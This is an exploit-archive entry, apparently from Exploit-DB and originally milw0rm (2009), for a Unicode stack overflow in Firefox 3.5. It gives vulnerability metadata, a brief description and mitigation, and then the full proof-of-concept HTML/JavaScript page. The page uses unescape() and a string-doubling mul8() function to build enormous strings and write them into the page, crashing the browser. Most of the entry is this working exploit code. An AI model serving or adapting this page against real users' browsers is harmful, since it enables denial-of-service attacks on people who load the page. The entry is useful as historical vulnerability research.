Firefox 3.5 unicode stack overflow

vendor:

Firefox

by:

Andrew Haynes, Simon Berry-Byrne

9,3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Firefox

Affected Version From: 3.5

Affected Version To: 3.5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Firefox 3.5 unicode stack overflow

This exploit is a stack overflow vulnerability in Firefox 3.5. It is caused by a combination of the mul8() function and the unescape() function. The mul8() function is used to create a string of a certain length, and the unescape() function is used to convert the string into a Unicode string. The vulnerability is triggered when the string is longer than the stack can handle, resulting in a stack overflow.

Mitigation:

The vulnerability can be mitigated by disabling JavaScript in the browser or by using a different browser.

Source

Exploit-DB raw data:

------------------------------------------->
Firefox 3.5 unicode stack overflow

Andrew Haynes , Simon Berry-Byrne


------------------------------------------->


<html>
<head>
<script language="JavaScript" type="Text/Javascript">
	var str = unescape("%u4141%u4141");
	var str2 = unescape("%u0000%u0000");
	var finalstr2 = mul8(str2, 49000000);
	var finalstr = mul8(str,   21000000);


document.write(finalstr2); 
document.write(finalstr); 

function mul8 (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-15]